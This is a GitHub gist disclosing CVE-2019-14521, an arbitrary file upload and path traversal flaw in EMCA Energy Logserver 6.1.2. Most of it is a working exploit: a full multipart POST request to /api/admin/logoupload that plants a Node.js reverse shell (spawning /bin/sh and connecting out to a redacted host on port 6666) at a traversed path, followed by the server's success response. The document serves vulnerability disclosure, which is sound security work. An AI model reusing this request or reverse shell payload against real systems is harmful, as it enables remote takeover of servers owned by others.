Created
August 5, 2019 05:38
-
-
Save ahpaleus/effb46d4a9d9c2b9a452c98f64ddc2c7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2019-14521 - Arbitrary File Upload | |
| The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter. | |
| To exploit vulnerability, attacker has to change "filename" parameter and put malicious content into file (for example - reverse shell in node.js). Attacker can use path traversal to locate file anywhere. | |
| Request to the server: | |
| POST /api/admin/logoupload HTTP/1.1 | |
| Host: XXXXXXXXXXX | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 | |
| Accept: application/json, text/plain, */* | |
| Accept-Language: pl,en-US;q=0.7,en;q=0.3 | |
| Accept-Encoding: gzip, deflate | |
| Referer: https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/app/login | |
| kbn-version: 6.2.4 | |
| X-Csrf-Token: QSNZ7g3HUTZv1MniVh8bj4IaPQUL81Px | |
| Content-Type: multipart/form-data; boundary=---------------------------653820859933555141363061488 | |
| Content-Length: 740 | |
| Connection: close | |
| Cookie: sid-auth=Fe26.2**25296dc9fce823a993d01f0601a72154aa2ade42ea9004b8cc051d3961daf0a6*OpTLWQDkfk-6Fv4WTfzyCw*LM28Nb1W9gHPy4n9s5j-O4r9rNlHItji9PvhMxcBMMWz69Oi2rwKW5K21vwxAWlm4Q4n8aV9G7237zYLOb4HVA**3e5e132a726bac22877c5ea51d31c9c2d88b9eddd11e592ff0bcb13e0ddba8fd*wcNSqH9a462TDoXfH9DTugUIwoFQ7_G3lqpSCZRhJWk | |
| -----------------------------653820859933555141363061488 | |
| Content-Disposition: form-data; name="file"; filename="rshell.js" | |
| Content-Type: text/html | |
| (function(){ | |
| var net = require("net"), | |
| cp = require("child_process"), | |
| sh = cp.spawn("/bin/sh", []); | |
| var client = new net.Socket(); | |
| client.connect(6666, "XXXXXXXXXXX", function(){ | |
| client.pipe(sh.stdin); | |
| sh.stdout.pipe(client); | |
| sh.stderr.pipe(client); | |
| }); | |
| return /a/; | |
| })(); | |
| -----------------------------653820859933555141363061488 | |
| Content-Disposition: form-data; name="filename" | |
| ../../../../rshell.js | |
| -----------------------------653820859933555141363061488-- | |
| Response from the server: | |
| HTTP/1.1 200 OK | |
| kbn-name: kibana | |
| kbn-version: 6.2.4 | |
| content-type: text/html; charset=utf-8 | |
| cache-control: no-cache | |
| vary: accept-encoding | |
| Date: XXXXXXXXXXXXX | |
| Connection: close | |
| Content-Length: 21 | |
| Successfully uploaded | |
| Maciej Domanski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment